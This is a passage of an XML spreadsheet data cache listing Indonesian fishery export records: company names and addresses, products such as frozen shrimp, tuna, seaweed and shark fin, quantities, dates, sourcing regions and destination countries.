  </r>
  <r>
    <n v="20763"/>
    <x v="179"/>
    <s v="PT, GEMA ISTA RAYA"/>
    <s v="Jl, Tembero No, 17, Kel, Tanggulangin, Kec, Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Masak Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="720000"/>
    <m/>
    <s v="Congo, Ghana, Nigeria, Thailand"/>
  </r>
  <r>
    <n v="17169"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Segar"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kabupaten Badung, Kabupaten Lombok Timur, Kota Mataram"/>
    <s v="China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19906"/>
    <x v="181"/>
    <s v="PT. INDONESIA MARICULTURE INDUSTRIES (KM. MITRA KARIMUN-3)"/>
    <s v="Pulau Murai Batu, Kel. Keban, Kec. Moro, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Kakap Putih)"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <s v="Australia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20377"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20723"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Air Tawar Beku (Lele, Mujair, Patin, Nila)"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <s v="Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20987"/>
    <x v="182"/>
    <s v="PT. ROTE KARAGINAN NUSANTARA"/>
    <s v="Jl. Latukoko Oliana RT 003 RW 005, Kel. Tablolong, Kec. Kupang Barat, Kabupaten Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Semi Refined Carrageenan"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="22000"/>
    <s v="Kota Semarang, Kota Makassar"/>
    <s v="Argentina, China, Philippines"/>
  </r>
  <r>
    <n v="19830"/>
    <x v="65"/>
    <s v="UD, BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec, Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Hidup"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20398"/>
    <x v="65"/>
    <s v="UD, BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec, Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Hidup"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20402"/>
    <x v="65"/>
    <s v="UD, BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec, Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20968"/>
    <x v="182"/>
    <s v="PT. ROTE KARAGINAN NUSANTARA"/>
    <s v="Jl. Latukoko Oliana RT 003 RW 005, Kel. Tablolong, Kec. Kupang Barat, Kabupaten Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Alkali Treated Chips"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="22000"/>
    <s v="Kota Makassar"/>
    <s v="Argentina, China, Philippines"/>
  </r>
  <r>
    <n v="19274"/>
    <x v="183"/>
    <s v="PT. CHONG SEN TRADING"/>
    <s v="Jl. Raya Karangandong Legundi Business Park A7, Kel. Banjaran, Kec. Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-01-27T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Japan, Spain, Viet Nam"/>
  </r>
  <r>
    <n v="19636"/>
    <x v="165"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Kampung Adiwarna, Kec. Gedung Meneng, Kabupaten Tulang Bawang&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="United Kingdom, United States"/>
  </r>
  <r>
    <n v="19638"/>
    <x v="165"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Kampung Adiwarna, Kec. Gedung Meneng, Kabupaten Tulang Bawang&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="United Kingdom, United States"/>
  </r>
  <r>
    <n v="20561"/>
    <x v="184"/>
    <s v="PT. DEBIO"/>
    <s v="Pergudangan Cikupa Mas Jl. Mitramas Raya No.2C RT 009 RW 004, Kel. Talagasari, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Australia, China, New Zealand"/>
  </r>
  <r>
    <n v="20562"/>
    <x v="184"/>
    <s v="PT. DEBIO"/>
    <s v="Pergudangan Cikupa Mas Jl. Mitramas Raya No.2C RT 009 RW 004, Kel. Talagasari, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Australia, China, New Zealand"/>
  </r>
  <r>
    <n v="19618"/>
    <x v="90"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Kima 4 Kav K-9 Blok B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="70000"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Canada, Japan, United States"/>
  </r>
  <r>
    <n v="19619"/>
    <x v="90"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Kima 4 Kav K-9 Blok B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Lemadang, Pedang)"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Canada, Japan, United States"/>
  </r>
  <r>
    <n v="19620"/>
    <x v="90"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Kima 4 Kav K-9 Blok B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Lemadang, Pedang)"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Canada, Japan, United States"/>
  </r>
  <r>
    <n v="19796"/>
    <x v="124"/>
    <s v="PT. WINDUBLAMBANGAN SEJATI"/>
    <s v="Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="67767"/>
    <m/>
    <s v="France, Italy, United States"/>
  </r>
  <r>
    <n v="20906"/>
    <x v="151"/>
    <s v="PT. SURYA ALAM TUNGGAL"/>
    <s v="Jl. Raya Tropodo No.126, Kel. Tropodo, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="3744000"/>
    <m/>
    <s v="Canada, Japan, United States"/>
  </r>
  <r>
    <n v="21185"/>
    <x v="185"/>
    <s v="PT, INDOKOM SAMUDRA PERSADA"/>
    <s v="Jl, Ir, Sutami Km 12,5, Kel, Sukanegara, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-07-07T00:00:00"/>
    <n v="2484376.89"/>
    <s v="Kabupaten Lampung Selatan"/>
    <s v="China, Japan, United States"/>
  </r>
  <r>
    <n v="17170"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakap)"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Lombok Barat"/>
    <s v="China, Japan, United States"/>
  </r>
  <r>
    <n v="17176"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Segar (Lencam, Kerapu, Kakap)"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Lombok Timur"/>
    <s v="China, Japan, United States"/>
  </r>
  <r>
    <n v="20536"/>
    <x v="186"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Yos Sudarso No.72, Kel. Klatak, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-05-12T00:00:00"/>
    <n v="1852000"/>
    <m/>
    <s v="China, Japan, United States"/>
  </r>
  <r>
    <n v="20537"/>
    <x v="186"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Yos Sudarso No.72, Kel. Klatak, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-05-12T00:00:00"/>
    <n v="1852000"/>
    <m/>
    <s v="China, Japan, United States"/>
  </r>
  <r>
    <n v="21274"/>
    <x v="185"/>
    <s v="PT, INDOKOM SAMUDRA PERSADA"/>
    <s v="Jl, Ir, Sutami Km 12,5, Kel, Sukanegara, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-07-07T00:00:00"/>
    <n v="2484376.89"/>
    <m/>
    <s v="China, Japan, United States"/>
  </r>
  <r>
    <n v="21249"/>
    <x v="187"/>
    <s v="KOPERASI SYARIAH BINA MASYARAKAT SEJAHTERA"/>
    <s v="Jl. Usman Harun RT 001, Kel. Sei Pancang, Kec. Sebatik Utara, Kabupaten Nunukan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Demersal Beku (Senangin, Alu-alu, Kerapu, Bawal, Kakap, Kuro, Merah)"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Surabaya, Kota Balikpapan, Kabupaten Bulungan, Kabupaten Nunukan, Kota Tarakan, Kota Makassar"/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21250"/>
    <x v="187"/>
    <s v="KOPERASI SYARIAH BINA MASYARAKAT SEJAHTERA"/>
    <s v="Jl. Usman Harun RT 001, Kel. Sei Pancang, Kec. Sebatik Utara, Kabupaten Nunukan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Pelagis Beku (Teri, Panni, Lemuru, Tongkol, Kembung, Layang, Tenggiri)"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="970000"/>
    <s v="Kota Surabaya, Kota Balikpapan, Kabupaten Bulungan, Kabupaten Nunukan, Kota Tarakan, Kota Makassar"/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19306"/>
    <x v="112"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MIMIKA"/>
    <s v="Jl. Kawasan Industri Perikanan Poumako, Kel. Poumako, Kec. Mimika, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-01-29T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19910"/>
    <x v="157"/>
    <s v="CV. ASRYL PERKASA"/>
    <s v="Perumahan Citra Sanggalea Indah D4 No.4, Kel. Taroada, Kec. Turikale, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-02-21T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Japan, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20369"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang-Tuban, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="200"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20388"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Netherlands, United States"/>
  </r>
  <r>
    <n v="20455"/>
    <x v="108"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Worang By Pass, Desa Kaima, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Netherlands, United States"/>
  </r>
  <r>
    <n v="20594"/>
    <x v="188"/>
    <s v="PT. LAUT UNITED"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan No.42, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="520"/>
    <m/>
    <s v="China, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20950"/>
    <x v="189"/>
    <s v="PT. TRI NUSANTARA MAKMUR"/>
    <s v="Jl. Margomulyo Indah 1 F No.23, Kel. Balongsari, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia"/>
  </r>
  <r>
    <n v="20556"/>
    <x v="145"/>
    <s v="PT, PAHALA BAHARI NUSANTARA"/>
    <s v="Kawasan Industri Karyadeka Pancamurni Kav, B3, Kel, Pasirsari, Kec, Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Ikan"/>
    <d v="2020-05-05T00:00:00"/>
    <n v="4000000"/>
    <s v="Kota Bekasi, Kota Tangerang, Kota Serang"/>
    <s v="Japan, Malaysia, Thailand"/>
  </r>
  <r>
    <n v="19336"/>
    <x v="190"/>
    <s v="PT. ALAMSEGAR JAYA"/>
    <s v="Jl. Kosambi Perancis Permai Blok L No.15, 15A, 16, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="500000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19337"/>
    <x v="190"/>
    <s v="PT. ALAMSEGAR JAYA"/>
    <s v="Jl. Kosambi Perancis Permai Blok L No.15, 15A, 16, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Marlin, Gindara, Cakalang, Tenggiri, Salem)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19338"/>
    <x v="190"/>
    <s v="PT. ALAMSEGAR JAYA"/>
    <s v="Jl. Kosambi Perancis Permai Blok L No.15, 15A, 16, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Bawal, Lencam, Kerapu, Layur, Kakap, Ayam-ayam)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19339"/>
    <x v="190"/>
    <s v="PT. ALAMSEGAR JAYA"/>
    <s v="Jl. Kosambi Perancis Permai Blok L No.15, 15A, 16, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="150000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19340"/>
    <x v="191"/>
    <s v="PT. BANDAR JAYA SENTOSA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok KK16 - KK17, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi, Salem)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="500000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19341"/>
    <x v="191"/>
    <s v="PT. BANDAR JAYA SENTOSA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok KK16 - KK17, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Marlin, Gindara, Layang, Cakalang, Tenggiri, Salem)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19342"/>
    <x v="191"/>
    <s v="PT. BANDAR JAYA SENTOSA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok KK16 - KK17, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demesal Beku (Bawal, Lencam, Kerapu, Layur, Ayam-Ayam, Ekor Kuning)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="150000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19343"/>
    <x v="191"/>
    <s v="PT. BANDAR JAYA SENTOSA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok KK16 - KK17, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="150000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19344"/>
    <x v="191"/>
    <s v="PT. BANDAR JAYA SENTOSA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok KK16 - KK17, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19393"/>
    <x v="192"/>
    <s v="PT. MINA JAYA LESTARI PLANT 2"/>
    <s v="Pergudangan Margomulyo Permai Blok K-14, K-15, K-16, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Layang, Cakalang)"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Surabaya"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19394"/>
    <x v="192"/>
    <s v="PT. MINA JAYA LESTARI PLANT 2"/>
    <s v="Pergudangan Margomulyo Permai Blok K-14, K-15, K-16, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Surabaya"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20778"/>
    <x v="134"/>
    <s v="PT. STARFOOD INTERNATIONAL"/>
    <s v="Jl. Raya Deandles Km 76, Kel. Kandang Semangkon, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Ikan"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="2000000"/>
    <s v="Kota Surabaya"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20185"/>
    <x v="139"/>
    <s v="PT. DHARMINDO SAMUDRA ABADI"/>
    <s v="Jl. Raya Sarang-Tuban No.89, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Teri Nasi Kering"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="9000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20631"/>
    <x v="94"/>
    <s v="CV, SINAR TIRTA"/>
    <s v="Jl, Rembang Industri VII/3 Pier Pasuruan, Kel, Pejangkungan, Kec, Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Senangin, Kakap Merah, Kakap, Kuro, Kurisi)"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="1080000"/>
    <m/>
    <s v="China, Malaysia, Thailand"/>
  </r>
  <r>
    <n v="21075"/>
    <x v="193"/>
    <s v="PT. KRISPI INDUSTRI INDONESIA"/>
    <s v="Dusun Banyu Urip RT 001 RW 001, Kel. Mojorejo, Kec. Pungging, Kabupaten Mojokerto&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan, Kerupuk Udang"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="318900"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21170"/>
    <x v="194"/>
    <s v="PT. MINA MAJU SEJAHTERA"/>
    <s v="Jl. Cinranae No.1, Kel. Marumpa, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-09-22T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19942"/>
    <x v="114"/>
    <s v="CV, ANUGERAH BAHARI MANDIRI"/>
    <s v="Jl, Kapasa Raya No,38A, Kel, Kapasa, Kec, Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Singapore, United States"/>
  </r>
  <r>
    <n v="20153"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Cakalang, Tenggiri)"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="19920"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Denpasar"/>
    <s v="Singapore, United States"/>
  </r>
  <r>
    <n v="17429"/>
    <x v="143"/>
    <s v="PT. ANEKA SUMBER ALAM JAYA"/>
    <s v="Jl. Pandaan Bangil Km 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="20346"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kerisi, Lencam, Kerapu, Layur, Kakap, Ekor Kuning, Barramundi)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="834"/>
    <m/>
    <s v="Singapore, United States"/>
  </r>
  <r>
    <n v="20350"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Singapore, United States"/>
  </r>
  <r>
    <n v="21139"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Hong Kong, United States"/>
  </r>
  <r>
    <n v="20064"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Beku"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan"/>
  </r>
  <r>
    <n v="20065"/>
    <x v="196"/>
    <s v="PT. HARTA SAMUDRA"/>
